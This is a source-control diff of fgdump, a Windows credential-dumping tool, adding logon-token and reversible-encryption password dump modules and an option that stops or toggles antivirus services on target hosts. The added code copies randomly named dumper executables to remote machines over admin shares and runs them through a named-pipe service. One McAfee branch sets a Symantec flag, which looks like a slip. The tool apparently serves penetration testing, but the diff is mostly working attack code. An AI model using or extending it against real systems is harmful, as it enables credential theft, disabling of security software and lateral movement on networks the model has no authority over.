Index: fgdump.rc =================================================================== --- fgdump.rc (revision 1246) +++ fgdump.rc (revision 1355) @@ -57,6 +57,8 @@ IDR_CACHEDUMP64 BIN "cachedump64.exe" IDR_PWDUMP BIN "PwDump.exe" IDR_FGEXEC BIN "fgexec.exe" +IDR_WHOSTHERE BIN "whosthere.exe" +IDR_REVDUMP BIN "revdump.exe" ///////////////////////////////////////////////////////////////////////////// // Index: pstgdump/Release/pstgdump.exe =================================================================== Cannot display: file marked as a binary type. svn:mime-type = application/octet-stream Index: pstgdump/pstgdump.vcproj =================================================================== --- pstgdump/pstgdump.vcproj (revision 1246) +++ pstgdump/pstgdump.vcproj (revision 1355) @@ -1,110 +1,173 @@ + Keyword="Win32Proj" + TargetFrameworkVersion="131072" + > + Name="Win32" + /> + + + InheritedPropertySheets="$(VCInstallDir)VCProjectDefaults\UpgradeFromVC71.vsprops" + CharacterSet="2" + > + + + + + + Detect64BitPortabilityProblems="true" + DebugInformationFormat="4" + /> + Name="VCManagedResourceCompilerTool" + /> + + + RandomizedBaseAddress="1" + DataExecutionPrevention="0" + TargetMachine="1" + /> + Name="VCALinkTool" + /> + Name="VCManifestTool" + /> + Name="VCXDCMakeTool" + /> + Name="VCBscMakeTool" + /> + Name="VCFxCopTool" + /> + Name="VCAppVerifierTool" + /> - - - + Name="VCPostBuildEventTool" + /> + InheritedPropertySheets="$(VCInstallDir)VCProjectDefaults\UpgradeFromVC71.vsprops" + CharacterSet="2" + > + + + + + + Detect64BitPortabilityProblems="true" + DebugInformationFormat="3" + /> + Name="VCManagedResourceCompilerTool" + /> + + + RandomizedBaseAddress="1" + DataExecutionPrevention="0" + TargetMachine="1" + /> + Name="VCALinkTool" + /> + Name="VCManifestTool" + /> + Name="VCXDCMakeTool" + /> + Name="VCBscMakeTool" + /> + Name="VCFxCopTool" + /> + Name="VCAppVerifierTool" + /> - - - + Name="VCPostBuildEventTool" + /> @@ -113,53 +176,68 @@ + UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}" + > + RelativePath=".\ProtectedStorage.cpp" + > + RelativePath=".\pstgdump.cpp" + > + RelativePath=".\stdafx.cpp" + > + Name="Debug|Win32" + > + UsePrecompiledHeader="1" + /> + Name="Release|Win32" + > + UsePrecompiledHeader="1" + /> + RelativePath=".\XGetopt.cpp" + > + UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}" + > + RelativePath=".\ProtectedStorage.h" + > + RelativePath=".\debug\pstorec.tlh" + > + RelativePath=".\stdafx.h" + > + RelativePath=".\XGetopt.h" + > + UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}" + > Index: pstgdump/Debug/pstgdump.exe =================================================================== Cannot display: file marked as a binary type. svn:mime-type = application/octet-stream Index: fgdump.cpp =================================================================== --- fgdump.cpp (revision 1246) +++ fgdump.cpp (revision 1355) @@ -33,6 +33,8 @@ bFullRun = true; bRunPwdump = true; bRunCachedump = true; + bRunWhosThere = false; + bRunRevDump = false; bRunPStgDump = false; bSkipExisting = true; bContinueOnUnknownAV = false; @@ -50,6 +52,7 @@ bSkipPwdumpHistory = false; bRunLocal = false; bSkipAVCheck = false; + bToggleAV = false; nOSBits = 0; // OS 32/64 flag has not been overridden memset(lpszSourceFile, 0, MAX_PATH + 1); @@ -120,6 +123,12 @@ bFullRun = !bTestOnly; } +void FGDump::SetToggleOnlyAV(bool bToggleOnly) +{ + bToggleAV = bToggleOnly; + bFullRun = false; +} + void FGDump::SetSkipCacheDump(bool bSkip) { bRunCachedump = !bSkip; @@ -129,7 +138,17 @@ { bRunPwdump = !bSkip; } +void FGDump::SetSkipWhosThere(bool bSkip) +{ + bRunWhosThere = !bSkip; +} +void FGDump::SetSkipRevDump(bool bSkip) +{ + bRunRevDump = !bSkip; +} + + void FGDump::SetSkipProtectedStorageDump(bool bSkip) { bRunPStgDump = !bSkip; @@ -201,7 +220,7 @@ { ResourceLoader objResPWDump, objResFGExec; ResourceLoader objLSADump, objResCacheDump, objResPStgDump; - ResourceLoader objResCacheDump64; + ResourceLoader objResCacheDump64, objResWhosThere, objResRevDump; size_t nLen; FILE* fileInput = NULL; char szPwdTemp[101]; @@ -259,7 +278,7 @@ SetPassword(szPwdTemp); } - if ((bRunCachedump == false && bRunPwdump == false) && bFullRun == true) + if ((bRunCachedump == false && bRunPwdump == false && bRunWhosThere == false && bRunRevDump == false) && bFullRun == true) { Log.ReportError(CRITICAL, "ERROR: You cannot specify -c *and* -w, unless you use -t\n"); ExitApp(1); @@ -299,6 +318,8 @@ memset(lpszPWDumpPath, 0, MAX_PATH + 15); memset(lpszFGExecPath, 0, MAX_PATH + 15); memset(lpszCacheDumpPath, 0, MAX_PATH + 15); + memset(lpszWhosTherePath, 0, MAX_PATH + 15); + memset(lpszRevDumpPath, 0, MAX_PATH + 15); memset(lpszPStoragePath, 0, MAX_PATH + 15); memset(lpszCacheDump64Path, 0, MAX_PATH + 15); @@ -308,12 +329,18 @@ RandomName::GetRandomName((char**)&temp, 5, 10, "exe"); temp = lpszFgExecExeName; RandomName::GetRandomName((char**)&temp, 5, 10, "exe"); + temp = lpszWhosThereExeName; + RandomName::GetRandomName((char**)&temp, 5, 10, "exe"); + temp = lpszRevDumpExeName; + RandomName::GetRandomName((char**)&temp, 5, 10, "exe"); _snprintf(lpszPWDumpPath, MAX_PATH + 15, "%s%s", lpszTempPath, "pwdump.exe"); _snprintf(lpszFGExecPath, MAX_PATH + 15, "%s%s", lpszTempPath, lpszFgExecExeName); _snprintf(lpszCacheDumpPath, MAX_PATH + 15, "%s%s", lpszTempPath, lpszCacheDumpExeName); _snprintf(lpszPStoragePath, MAX_PATH + 15, "%s%s", lpszTempPath, "pstgdump.exe"); _snprintf(lpszCacheDump64Path, MAX_PATH + 15, "%s%s", lpszTempPath, lpszCacheDump64ExeName); + _snprintf(lpszWhosTherePath, MAX_PATH + 15, "%s%s", lpszTempPath, lpszWhosThereExeName); + _snprintf(lpszRevDumpPath, MAX_PATH + 15, "%s%s", lpszTempPath, lpszRevDumpExeName); // If antivirus is running locally, turn it off, since it may disrupt the storage // of the worker files locally. Only do this if the user hasn't disabled it. @@ -349,6 +376,10 @@ ExitApp(1); if (!objResCacheDump64.UnpackResource(IDR_CACHEDUMP64, lpszCacheDump64Path)) ExitApp(1); + if (!objResWhosThere.UnpackResource(IDR_WHOSTHERE, lpszWhosTherePath)) + ExitApp(1); + if (!objResRevDump.UnpackResource(IDR_REVDUMP, lpszRevDumpPath)) + ExitApp(1); // Set up the thread pool CreateThreadPool(); Index: RevDumpControl.h =================================================================== --- RevDumpControl.h (revision 0) +++ RevDumpControl.h (revision 1355) @@ -0,0 +1,37 @@ +/****************************************************************************** +fgdump - by fizzgig and the foofus.net group +Copyright (C) 2010 by JoMo-Kun +http://www.foofus.net + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +as published by the Free Software Foundation; either version 2 +of the License, or (at your option) any later version. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. +******************************************************************************/ +#pragma once +#ifndef _REVDUMPCONTROL_H +#define _REVDUMPCONTROL_H + +class RevDumpControl +{ +public: + RevDumpControl(LONG nCacheID = -1); + ~RevDumpControl(void); + + bool Execute(const char* lpszPSExecPath, const char* lpszDumpPath, char* lpszMachine, char* lpszExeName, char* lpszPipeName = NULL); + +private: + LONG m_nCacheID; + +}; + +#endif \ No newline at end of file Index: HostDumper.cpp =================================================================== --- HostDumper.cpp (revision 1246) +++ HostDumper.cpp (revision 1355) @@ -20,6 +20,8 @@ #include "StdAfx.h" #include "hostdumper.h" #include "CacheDumpControl.h" +#include "WhosThereControl.h" +#include "RevDumpControl.h" #include "ProtectedStorageControl.h" #include "ServiceControl.h" #include "Impersonator.h" @@ -81,7 +83,7 @@ PWDumpControl objPWDump(nCacheID); Impersonator impersonate(nCacheID); char szPath[MAX_PATH + 1]; - bool bSkipPwdump = false, bSkipCachedump = false, bSkipPStg = true; + bool bSkipPwdump = false, bSkipCachedump = false, bSkipWhosThere = false, bSkipPStg = true, bSkipRevDump = false; char* szWindowsVersion; GUID guidPipe; WCHAR wszGUID[CHARS_IN_GUID + 1]; @@ -121,12 +123,24 @@ Log.CachedReportError(nCacheID, INFO, "INFO: skipping cachedump on %s because %s exists or I was told to skip cache dumps\n", lpszServer, szPath); memset(szPath, 0, MAX_PATH + 1); + _snprintf(szPath, MAX_PATH, "%s.whosthere", lpszServer); + bSkipWhosThere = (FileExists(szPath) && fgdumpMain->bSkipExisting) || !fgdumpMain->bRunWhosThere; + if (bSkipWhosThere) + Log.CachedReportError(nCacheID, INFO, "INFO: skipping token dump on %s because %s exists or I was told to skip token dumps\n", lpszServer, szPath); + + memset(szPath, 0, MAX_PATH + 1); + _snprintf(szPath, MAX_PATH, "%s.revdump", lpszServer); + bSkipRevDump = (FileExists(szPath) && fgdumpMain->bSkipExisting) || !fgdumpMain->bRunRevDump; + if (bSkipRevDump) + Log.CachedReportError(nCacheID, INFO, "INFO: skipping reversible encryption value dump on %s because %s exists or I was told to skip reversible encryption dumps\n", lpszServer, szPath); + + memset(szPath, 0, MAX_PATH + 1); _snprintf(szPath, MAX_PATH, "%s.lsadump", lpszServer); bSkipPStg = (FileExists(szPath) && fgdumpMain->bSkipExisting) || !fgdumpMain->bRunPStgDump; if (bSkipPStg) Log.CachedReportError(nCacheID, INFO, "INFO: skipping dump of protected storage secrets on %s because %s exists or I was told to skip LSA dumps\n", lpszServer, szPath); - if (bSkipCachedump && bSkipPwdump && bSkipPStg) + if (bSkipCachedump && bSkipPwdump && bSkipWhosThere && bSkipPStg && bSkipRevDump) { Log.CachedReportError(nCacheID, CRITICAL, "Skipping: nothing to do\n"); LogFailed.WriteFailedHost(lpszServer, FGDUMP_ERROR_BASE + 1, false, "Skipping: nothing to do"); @@ -220,10 +234,19 @@ switch(sControls.objTrendService->GetServiceState(lpszServer)) { case AV_STOPPED: - Log.CachedReportError(nCacheID, fgdumpMain->bFullRun ? INFO : CRITICAL, "Trend is installed on this box, but not currently running. Leaving the service alone.\n"); + if (fgdumpMain->bToggleAV) + { + Log.CachedReportError(nCacheID, INFO, "Trend is installed on this box, but currently not running. Restarting it as requested by user.\n"); + bTrendAVIsRunning = true; + } + else + { + Log.CachedReportError(nCacheID, fgdumpMain->bFullRun ? INFO : CRITICAL, "Trend is installed on this box, but not currently running. Leaving the service alone.\n"); + } + break; case AV_STARTED: - if (fgdumpMain->bFullRun) + if ((fgdumpMain->bFullRun) || (fgdumpMain->bToggleAV)) { bTrendAVIsRunning = true; Log.CachedReportError(nCacheID, INFO, "Trend is running on this machine, shutting it down for a bit...\n"); @@ -232,6 +255,9 @@ LogFailed.WriteFailedHost(lpszServer, GetLastError(), false, "Trend AV was running but could not be stopped"); throw(1); } + + if (fgdumpMain->bToggleAV) + bTrendAVIsRunning = false; } else { @@ -259,10 +285,19 @@ switch(sControls.objSophosService->GetServiceState(lpszServer)) { case AV_STOPPED: - Log.CachedReportError(nCacheID, fgdumpMain->bFullRun ? INFO : CRITICAL, "Sophos is installed on this box, but not currently running. Leaving the service alone but proceeding with pwdump and cachedump\n"); + if (fgdumpMain->bToggleAV) + { + Log.CachedReportError(nCacheID, INFO, "Sophos is installed on this box, but currently not running. Restarting it as requested by user.\n"); + bSophosAVIsRunning = true; + } + else + { + Log.CachedReportError(nCacheID, fgdumpMain->bFullRun ? INFO : CRITICAL, "Sophos is installed on this box, but not currently running. Leaving the service alone but proceeding with pwdump and cachedump\n"); + } + break; case AV_STARTED: - if (fgdumpMain->bFullRun) + if ((fgdumpMain->bFullRun) || (fgdumpMain->bToggleAV)) { bSophosAVIsRunning = true; Log.CachedReportError(nCacheID, INFO, "Sophos is running on this machine, shutting it down for a bit...\n"); @@ -271,6 +306,9 @@ LogFailed.WriteFailedHost(lpszServer, GetLastError(), false, "Sophos AV was running but could not be stopped"); throw(1); } + + if (fgdumpMain->bToggleAV) + bSophosAVIsRunning = false; } else { @@ -298,10 +336,19 @@ switch(sControls.objMcAfeeService->GetServiceState(lpszServer)) { case AV_STOPPED: - Log.CachedReportError(nCacheID, fgdumpMain->bFullRun ? INFO : CRITICAL, "McAfee is installed on this box, but not currently running. Leaving the service alone but proceeding with pwdump and cachedump\n"); + if (fgdumpMain->bToggleAV) + { + Log.CachedReportError(nCacheID, INFO, "McAfee is installed on this box, but currently not running. Restarting it as requested by user.\n"); + bMCAVIsRunning = true; + } + else + { + Log.CachedReportError(nCacheID, fgdumpMain->bFullRun ? INFO : CRITICAL, "McAfee is installed on this box, but not currently running. Leaving the service alone but proceeding with pwdump and cachedump\n"); + } + break; case AV_STARTED: - if (fgdumpMain->bFullRun) + if ((fgdumpMain->bFullRun) || (fgdumpMain->bToggleAV)) { bMCAVIsRunning = true; Log.CachedReportError(nCacheID, INFO, "McAfee is running on this machine, shutting it down for a bit...\n"); @@ -310,6 +357,9 @@ LogFailed.WriteFailedHost(lpszServer, GetLastError(), false, "McAfee AV was running but could not be stopped"); throw(1); } + + if (fgdumpMain->bToggleAV) + bSymantecAVIsRunning = false; } else { @@ -337,10 +387,19 @@ switch(sControls.objSAVService->GetServiceState(lpszServer)) { case AV_STOPPED: - Log.CachedReportError(nCacheID, fgdumpMain->bFullRun ? INFO : CRITICAL, "Symantec is installed on this box, but not currently running. Leaving the service alone but proceeding with pwdump and cachedump\n"); + if (fgdumpMain->bToggleAV) + { + Log.CachedReportError(nCacheID, INFO, "Symantec is installed on this box, but currently not running. Restarting it as requested by user.\n"); + bSymantecAVIsRunning = true; + } + else + { + Log.CachedReportError(nCacheID, fgdumpMain->bFullRun ? INFO : CRITICAL, "Symantec is installed on this box, but not currently running. Leaving the service alone but proceeding with pwdump and cachedump\n"); + } + break; case AV_STARTED: - if (fgdumpMain->bFullRun) + if ((fgdumpMain->bFullRun) || (fgdumpMain->bToggleAV)) { bSymantecAVIsRunning = true; Log.CachedReportError(nCacheID, INFO, "Symantec is running on this machine, shutting it down for a bit...\n"); @@ -349,6 +408,9 @@ LogFailed.WriteFailedHost(lpszServer, GetLastError(), false, "Symantec AV was running but could not be stopped"); throw(1); } + + if (fgdumpMain->bToggleAV) + bSymantecAVIsRunning = false; } else { @@ -416,6 +478,42 @@ } } + if (!bSkipWhosThere) + { + if (bRunLocal) + { + if (RunWhosThere(fgdumpMain->lpszTempPath) == false) // Don't want a pipe for local stuff + { + LogFailed.WriteFailedHost(lpszServer, GetLastError(), false, "Token dump failed - check error log"); + } + } + else + { + if (RunWhosThere(fgdumpMain->lpszTempPath, lpszPipeName) == false) + { + LogFailed.WriteFailedHost(lpszServer, GetLastError(), false, "Token dump failed - check error log"); + } + } + } + + if (!bSkipRevDump) + { + if (bRunLocal) + { + if (RunRevDump(fgdumpMain->lpszTempPath, NULL) == false) // Don't want a pipe for local stuff + { + LogFailed.WriteFailedHost(lpszServer, GetLastError(), false, "Reversible encryption value dump failed - check error log"); + } + } + else + { + if (RunRevDump(fgdumpMain->lpszTempPath, lpszPipeName) == false) + { + LogFailed.WriteFailedHost(lpszServer, GetLastError(), false, "Reversible encryption value dump failed - check error log"); + } + } + } + if (!bSkipPStg) { if (RunProtectedStorageDump(fgdumpMain->lpszTempPath, lpszUser, lpszPassword, lpszPipeName) == false) @@ -630,6 +728,10 @@ DeleteFile(lpszRemotePath); _snprintf(lpszRemotePath, MAX_PATH, "%s\\%s", lpszUNCRemotePath, fgdumpMain->lpszCacheDump64ExeName); DeleteFile(lpszRemotePath); + _snprintf(lpszRemotePath, MAX_PATH, "%s\\%s", lpszUNCRemotePath, fgdumpMain->lpszWhosThereExeName); + DeleteFile(lpszRemotePath); + _snprintf(lpszRemotePath, MAX_PATH, "%s\\%s", lpszUNCRemotePath, fgdumpMain->lpszRevDumpExeName); + DeleteFile(lpszRemotePath); _snprintf(lpszRemotePath, MAX_PATH, "%s\\%s", lpszUNCRemotePath, fgdumpMain->lpszFgExecExeName); DeleteFile(lpszRemotePath); @@ -652,6 +754,38 @@ return true; } +bool HostDumper::RunWhosThere(char* lpszTempPath, char* lpszPipeName) +{ + WhosThereControl objWhosThere(nCacheID); + + _snprintf(lpszRemotePath, MAX_PATH, "%s\\%s", lpszUNCRemotePath, fgdumpMain->lpszWhosThereExeName); + CopyFile(fgdumpMain->lpszWhosTherePath, lpszRemotePath, FALSE); + + if (!objWhosThere.Execute(fgdumpMain->lpszFGExecPath, lpszCacheDumpRemotePath, lpszServer, fgdumpMain->lpszWhosThereExeName, lpszPipeName)) + { + Log.CachedReportError(nCacheID, CRITICAL, "Failed to dump logon tokens\n"); + return false; + } + + return true; +} + +bool HostDumper::RunRevDump(char* lpszTempPath, char* lpszPipeName) +{ + RevDumpControl objRevDump(nCacheID); + + _snprintf(lpszRemotePath, MAX_PATH, "%s\\%s", lpszUNCRemotePath, fgdumpMain->lpszRevDumpExeName); + CopyFile(fgdumpMain->lpszRevDumpPath, lpszRemotePath, FALSE); + + if (!objRevDump.Execute(fgdumpMain->lpszFGExecPath, lpszCacheDumpRemotePath, lpszServer, fgdumpMain->lpszRevDumpExeName, lpszPipeName)) + { + Log.CachedReportError(nCacheID, CRITICAL, "Failed to dump reversible encryption values\n"); + return false; + } + + return true; +} + bool HostDumper::RunProtectedStorageDump(char* lpszTempPath, char* lpszUser, char* lpszPassword, char* lpszPipeName) { ProtectedStorageControl objPStgDump(nCacheID); Index: fgdump.vcproj =================================================================== --- fgdump.vcproj (revision 1246) +++ fgdump.vcproj (revision 1355) @@ -249,6 +249,10 @@ > + + @@ -293,6 +297,10 @@ > + + @@ -375,6 +383,10 @@ > + + @@ -403,6 +415,10 @@ > + + @@ -466,6 +482,10 @@ > + + @@ -473,6 +493,10 @@ RelativePath=".\servpw64.exe" > + + Index: fgexec/Release/fgexec.exe =================================================================== Cannot display: file marked as a binary type. svn:mime-type = application/octet-stream Index: fgexec/Debug/fgexec.exe =================================================================== Cannot display: file marked as a binary type. svn:mime-type = application/octet-stream Index: RevDumpControl.cpp =================================================================== --- RevDumpControl.cpp (revision 0) +++ RevDumpControl.cpp (revision 1355) @@ -0,0 +1,136 @@ +/****************************************************************************** +fgdump - by fizzgig and the foofus.net group +Copyright (C) 2010 by JoMo-Kun +http://www.foofus.net + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +as published by the Free Software Foundation; either version 2 +of the License, or (at your option) any later version. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. +******************************************************************************/ +#include "StdAfx.h" +#include "RevDumpControl.h" +#include "Process.h" + +RevDumpControl::RevDumpControl(LONG nCacheID) +{ + m_nCacheID = nCacheID; +} + + +RevDumpControl::~RevDumpControl(void) +{ + +} + +bool RevDumpControl::Execute(const char* lpszPSExecPath, const char* lpszDumpPath, char* lpszMachine, char* lpszExeName, char* lpszPipeName) +{ + char* lpszCmdLineFormat; + int nArgSize; + char* lpszStopCmdLine; + char* lpszParams; + bool result = false; + + if (lpszPipeName == NULL) + { + // Set the local RevDump path + lpszCmdLineFormat = "%s\\%s"; + nArgSize = _scprintf(lpszCmdLineFormat, lpszDumpPath, lpszExeName); + lpszStopCmdLine = new char[nArgSize + 1]; + memset(lpszStopCmdLine, 0, nArgSize + 1); + _snprintf(lpszStopCmdLine, nArgSize, lpszCmdLineFormat, lpszDumpPath, lpszExeName); + + // Now set the parameters + lpszCmdLineFormat = " -l"; + nArgSize = strlen(lpszCmdLineFormat); + lpszParams = new char[nArgSize + 1]; + memset(lpszParams, 0, nArgSize + 1); + _snprintf(lpszParams, nArgSize, lpszCmdLineFormat); + } + else + { + lpszStopCmdLine = new char[strlen(lpszPSExecPath) + 1]; + memset(lpszStopCmdLine, 0, strlen(lpszPSExecPath) + 1); + strncpy(lpszStopCmdLine, lpszPSExecPath, strlen(lpszPSExecPath)); + + lpszCmdLineFormat = " -c -n %s %s \"%s\\%s \" -l"; + + nArgSize = _scprintf(lpszCmdLineFormat, lpszPipeName, lpszMachine, lpszDumpPath, lpszExeName); + lpszParams = new char[nArgSize + 1]; + memset(lpszParams, 0, nArgSize + 1); + _snprintf(lpszParams, nArgSize, lpszCmdLineFormat, lpszPipeName, lpszMachine, lpszDumpPath, lpszExeName); + } + + try + { + Process p; + + HANDLE hProcess = p.CreateProcess(lpszStopCmdLine, lpszParams); + if (hProcess != 0) + { + DWORD dwResult = WaitForSingleObject(hProcess, 1200000); // Wait 20 minutes for process to complete + if (dwResult != WAIT_OBJECT_0) + { + Log.CachedReportError(m_nCacheID, CRITICAL, "Warning: RevDump did not complete in a timely manner - exiting"); + result = false; + } + else + { + // Read from process's output + char* szResult; + int nSize = 65535; + + szResult = new char[nSize]; + memset(szResult, 0, nSize); + p.ReadFromPipe(&szResult, nSize); + + // Was it successful? + if (strstr(szResult, "RevDump ") != NULL) + { + // Success + // Write results to a file + size_t nLen = strlen(lpszMachine) + 8; // 8 chars accounts for ".revdump" extension + char* szTempFilename = new char[nLen + 1]; + memset(szTempFilename, 0, nLen + 1); + _snprintf(szTempFilename, nLen, "%s.revdump", lpszMachine); + + std::ofstream outputFile(szTempFilename, std::ios::out | std::ios::trunc); + outputFile.write((const char*)szResult, (DWORD)strlen(szResult)); + outputFile.close(); + delete [] szTempFilename; + Log.CachedReportError(m_nCacheID, CRITICAL, "Reversible encryption values dumped successfully\n", lpszMachine); + result = true; + } + else + { + // Failed + Log.CachedReportError(m_nCacheID, CRITICAL, "Failed to dump reversible encryption values (the text returned follows):\n%s", szResult); + result = false; + } + + delete [] szResult; + } + } + else + result = false; + } + catch(...) + { + result = false; + } + + delete [] lpszStopCmdLine; + delete [] lpszParams; + + return result; +} + Index: Main.cpp =================================================================== --- Main.cpp (revision 1246) +++ Main.cpp (revision 1355) @@ -24,12 +24,15 @@ void Usage() { printf("Usage:\n"); - printf("%s [-?][-t][-c][-w][-s][-r][-v][-k][-o][-a][-O 32|64][-l logfile][-T threads] [{{-h Host | -f filename} -u Username -p Password | -H filename}]\n", "fgdump"); + printf("%s [-?][-t][-e][-c][-w][-x][-y][-s][-r][-v][-k][-o][-a][-O 32|64][-l logfile][-T threads] [{{-h Host | -f filename} -u Username -p Password | -H filename}]\n", "fgdump"); printf("\t where Username and Password have administrator credentials\n"); printf("\t -? displays help (you're looking at it!)\n"); printf("\t -t will test for the presence of antivirus without actually running the password dumps\n"); + printf("\t -e will toggle antivirus state (e.g. if enabled, then disable) \n"); printf("\t -c skips the cache dump\n"); printf("\t -w skips the password dump\n"); + printf("\t -x performs the logon token dump\n"); + printf("\t -y performs the reversible encryption value dump\n"); printf("\t -s performs the protected storage dump\n"); printf("\t -r forgets about existing pwdump/cachedump files. The default behavior is to skip a host if these files already exist.\n"); printf("\t -v makes output more verbose. Use twice for greater effect\n"); @@ -52,7 +55,7 @@ printf("fgDump 2.2.0 - fizzgig and the mighty group at foofus.net\n"); printf("*** THIS IS A BETA VERSION, YOU HAVE BEEN WARNED ***\n"); - printf("Written to make j0m0kun's life just a bit easier\n"); + printf("Written to make JoMo-Kun's life just a bit easier\n"); printf("Copyright(C) 2008 fizzgig and foofus.net\n"); printf("fgdump comes with ABSOLUTELY NO WARRANTY!\n"); printf("This is free software, and you are welcome to redistribute it\n"); @@ -64,7 +67,7 @@ printf("No parameters specified, doing a local dump. Specify -? if you are looking for help.\n"); } - while ((c = getopt(argc, argv, _T("h:tf:H:u:p:l:T:O:cwrvskoa?"))) != EOF) + while ((c = getopt(argc, argv, _T("h:tf:H:u:p:l:T:O:cwrvskoaexy?"))) != EOF) { switch(c) { @@ -77,6 +80,9 @@ case 't': fgd.SetTestOnlyAV(true); // Only check for AV break; + case 'e': + fgd.SetToggleOnlyAV(true); // Only toggle AV state + break; case 'f': if (strlen(optarg) > MAX_PATH) { @@ -111,6 +117,12 @@ case 'w': fgd.SetSkipPWDump(true); break; + case 'x': + fgd.SetSkipWhosThere(false); + break; + case 'y': + fgd.SetSkipRevDump(false); + break; case 's': fgd.SetSkipProtectedStorageDump(false); break; Index: fgdump.h =================================================================== --- fgdump.h (revision 1246) +++ fgdump.h (revision 1355) @@ -52,21 +52,28 @@ char lpszPSServicePath[MAX_PATH + 15]; char lpszCacheDumpPath[MAX_PATH + 15]; char lpszCacheDump64Path[MAX_PATH + 15]; + char lpszWhosTherePath[MAX_PATH + 15]; + char lpszRevDumpPath[MAX_PATH + 15]; char lpszPStoragePath[MAX_PATH + 15]; char lpszFGExecPath[MAX_PATH + 15]; char lpszCacheDumpExeName[MAX_EXE_NAME_LEN + 1]; char lpszCacheDump64ExeName[MAX_EXE_NAME_LEN + 1]; + char lpszWhosThereExeName[MAX_EXE_NAME_LEN + 1]; + char lpszRevDumpExeName[MAX_EXE_NAME_LEN + 1]; char lpszFgExecExeName[MAX_EXE_NAME_LEN + 1]; - bool bFullRun, bRunPwdump, bRunCachedump, bRunPStgDump, bSkipExisting, bContinueOnUnknownAV; + bool bFullRun, bRunPwdump, bRunWhosThere, bRunRevDump, bRunCachedump, bRunPStgDump, bSkipExisting, bContinueOnUnknownAV, bToggleAV; bool bSkipPwdumpHistory; bool bRunLocal; bool bSkipAVCheck; int nOSBits; void SetTestOnlyAV(bool bTestOnly); + void SetToggleOnlyAV(bool bToggleOnly); void SetSkipCacheDump(bool bSkip); void SetSkipPWDump(bool bSkip); + void SetSkipWhosThere(bool bSkip); + void SetSkipRevDump(bool bSkip); void SetSkipProtectedStorageDump(bool bSkip); void SetIgnoreExistingFiles(bool bIgnoreExisting); void SetHostfileName(char* szFile); Index: HostDumper.h =================================================================== --- HostDumper.h (revision 1246) +++ HostDumper.h (revision 1355) @@ -58,6 +58,8 @@ bool bRunLocal; bool RunCacheDump(char* lpszTempPath, bool bIs64Bit, char* lpszPipeName = NULL); + bool RunWhosThere(char* lpszTempPath, char* lpszPipeName = NULL); + bool RunRevDump(char* lpszTempPath, char* lpszPipeName = NULL); bool RunProtectedStorageDump(char* lpszTempPath, char* lpszUser, char* lpszPassword, char* lpszPipeName); bool StopAndRemoveFGExec(bool* bIsFgexecStillInstalled); bool InstallAndStartFGExec(const char* lpszPipeName, bool* bIsFgexecStillInstalled); Index: WhosThereControl.h =================================================================== --- WhosThereControl.h (revision 0) +++ WhosThereControl.h (revision 1355) @@ -0,0 +1,37 @@ +/****************************************************************************** +fgdump - by fizzgig and the foofus.net group +Copyright (C) 2009 by JoMo-Kun +http://www.foofus.net + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +as published by the Free Software Foundation; either version 2 +of the License, or (at your option) any later version. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. +******************************************************************************/ +#pragma once +#ifndef _WHOSTHERECONTROL_H +#define _WHOSTHERECONTROL_H + +class WhosThereControl +{ +public: + WhosThereControl(LONG nCacheID = -1); + ~WhosThereControl(void); + + bool Execute(const char* lpszPSExecPath, const char* lpszDumpPath, char* lpszMachine, char* lpszExeName, char* lpszPipeName = NULL); + +private: + LONG m_nCacheID; + +}; + +#endif \ No newline at end of file Index: resource.h =================================================================== --- resource.h (revision 1246) +++ resource.h (revision 1355) @@ -3,24 +3,21 @@ // Used by fgdump.rc // #define IDR_PSTGDUMP 130 -#define IDR_BIN1 152 -#define IDR_BIN2 157 -#define IDR_BIN3 173 -#define IDR_BIN4 180 #define IDR_CACHEDUMP 181 -#define IDR_BIN6 182 #define IDR_CACHEDUMP64 182 #define IDR_PWDUMP 183 -#define IDR_BIN5 184 #define IDR_FGEXEC 184 +#define IDR_WHOSTHERE 194 +#define IDR_REVDUMP 195 +#define IDR_BIN1 199 // Next default values for new objects // #ifdef APSTUDIO_INVOKED #ifndef APSTUDIO_READONLY_SYMBOLS -#define _APS_NEXT_RESOURCE_VALUE 185 +#define _APS_NEXT_RESOURCE_VALUE 200 #define _APS_NEXT_COMMAND_VALUE 40001 #define _APS_NEXT_CONTROL_VALUE 1001 -#define _APS_NEXT_SYMED_VALUE 101 +#define _APS_NEXT_SYMED_VALUE 103 #endif #endif Index: Release/fgdump.exe =================================================================== Cannot display: file marked as a binary type. svn:mime-type = application/octet-stream Index: Debug/fgdump.exe =================================================================== Cannot display: file marked as a binary type. svn:mime-type = application/octet-stream Index: whosthere.exe =================================================================== Cannot display: file marked as a binary type. svn:mime-type = application/octet-stream Property changes on: whosthere.exe ___________________________________________________________________ Added: svn:mime-type + application/octet-stream Index: WhosThereControl.cpp =================================================================== --- WhosThereControl.cpp (revision 0) +++ WhosThereControl.cpp (revision 1355) @@ -0,0 +1,136 @@ +/****************************************************************************** +fgdump - by fizzgig and the foofus.net group +Copyright (C) 2009 by JoMo-Kun +http://www.foofus.net + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +as published by the Free Software Foundation; either version 2 +of the License, or (at your option) any later version. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. 